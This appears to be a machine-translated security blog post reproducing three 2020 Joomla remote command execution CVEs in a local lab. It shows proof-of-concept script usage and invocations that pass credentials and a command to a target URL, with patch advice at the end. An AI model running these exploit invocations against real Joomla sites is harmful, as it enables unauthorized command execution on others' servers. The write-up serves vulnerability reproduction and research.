JoomlaRCE remote code execution

Cve-2020-11890 <3.9.17 Remote Command Execution Vulnerability CVE-2020-10238 <= 3.9.15 Remote Command Execution Vulnerability CVE-2020-10239 3.7.0 to 3.9.15 Remote Command execution VulnerabilityCopy the code

Ii. Details of vulnerabilities:

Joomla! Is an Open Source, cross-platform content management system (CMS) developed by the Open Source Matters team using PHP and MySQL.

This vulnerability number has been assigned and details will be updated soon.

Affected version:

CVE-2020-11890 <3.9.17  
CVE-2020-10238 <= 3.9.15 
CVE-2020-10239 3.7.0 to 3.9.15 
Copy the code

Iii. Experimental Recurrence Environment:

Downloads.joomla.org/cms/joomla3…

Downloads.joomla.org/cms/joomla3…

or

Background reply “Joomla2020” obtain the environment and POC

Installation environment process:

Filling in configuration Information

Database information

Profile information

The installation is complete

A successful login

Environment Installation succeeded

4. Vulnerability recurrence verification

1. Vulnerability verification

CVE-2020-11890

Example script parameters:

➜ thelostworld Qualify Python2 CVE-2020-11890.py -h Usage: CVE-2020-11890.py [-h] -url URL -u USERNAME -p PASSWORD [-usuper USERNAMESUPER] [-psuper PASSWORDSUPER] [-esuper EMAILSUPER] [-cmd COMMAND] optional arguments: -h, --help show this help message and exit -url URL, --url URL URL for your Joomla target -u USERNAME, --username USERNAME username -p PASSWORD, --password PASSWORD password -usuper USERNAMESUPER, --usernamesuper USERNAMESUPER Super's username -psuper PASSWORDSUPER, --passwordsuper PASSWORDSUPER Super's password -esuper EMAILSUPER, --emailsuper EMAILSUPER Super's Email -cmd COMMAND, --command COMMAND commandCopy the code

Command executed successfully

Python2 cve202011890. Py - url http://192.168.0.102:8080 - u thelostworld -p thelostworld -cmd PWDCopy the code

2. Vulnerability verification

CVE-2020-10238

Example script parameters:

➜ thelostworld Qualify Python2 RCE.py -h Usage: RCE.py [-h] -url URL -u USERNAME -p PASSWORD [-cmd COMMAND] optional arguments: -h, --help show this help message and exit -url URL, --url URL URL for your Joomla target -u USERNAME, --username USERNAME username -p PASSWORD, --password PASSWORD password -cmd COMMAND, --command COMMAND commandCopy the code

Execute successfully

Python2 RCE. Py - url http://192.168.0.102:8080 - u thelostworld -p thelostworld -cmd PWDCopy the code

2. Vulnerability verification

CVE-2020-10239

Example script parameters:

➜ thelostworld Qualify Python2 CVE202010239. py -h Usage: cve202010239.py [-h] -url URL -u USERNAME -p PASSWORD [-cmd COMMAND] optional arguments: -h, --help show this help message and exit -url URL, --url URL URL for your Joomla target -u USERNAME, --username USERNAME username -p PASSWORD, --password PASSWORD password -cmd COMMAND, --command COMMAND commandCopy the code

Execute successfully

Python2 cve202010239. Py - url http://192.168.0.102:8080 - u thelostworld -p thelostworld -cmd PWDCopy the code

Vi. Vulnerability repair:

Official website to download the latest version and team patches:

Downloads.joomla.org/

Reference links:

www.secfree.com/vul-141066….

wiki.0-sec.org/?q=joomla

Background reply “Joomla2020” obtain the environment and POC

Disclaimer: This site provides safety tools, procedures (methods) may be offensive, only for safety research and teaching, risk!

Subscribe for more revisited articles and study notes

thelostworld

Safe road, side by side with you !!!!

Personal knowledge: www.zhihu.com/people/fu-w…

Brief personal book: www.jianshu.com/u/bf0e38a8d…